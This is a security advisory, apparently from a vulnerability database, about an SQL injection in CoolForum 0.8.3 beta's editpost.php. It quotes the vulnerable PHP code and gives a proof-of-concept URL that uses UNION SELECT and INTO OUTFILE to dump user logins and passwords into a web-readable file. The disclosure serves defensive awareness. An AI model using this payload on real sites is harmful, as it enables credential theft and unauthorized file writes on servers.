Critical SQL Injection in CoolForum

2006-06-07 / 2006-06-08
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Type: SQL Injection Risk: Critical Product: CoolForum <= 0.8.3 beta ******************************** Vulnerability ************* // File: editpost.php // Line 38 // if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']); else $post = 0; -- // Line 77 // $canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']); -- // File: admin/functions.php // Line 623 // function getrightedit($idpost,$forumid) { global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM; $query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpost=".$idpost); $j = mysql_fetch_array($query); -- Proof Of Concept **************** http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1 Credits ******* Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt Note: Others SQL Injection exists but they are difficult to exploit by DarkFig


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top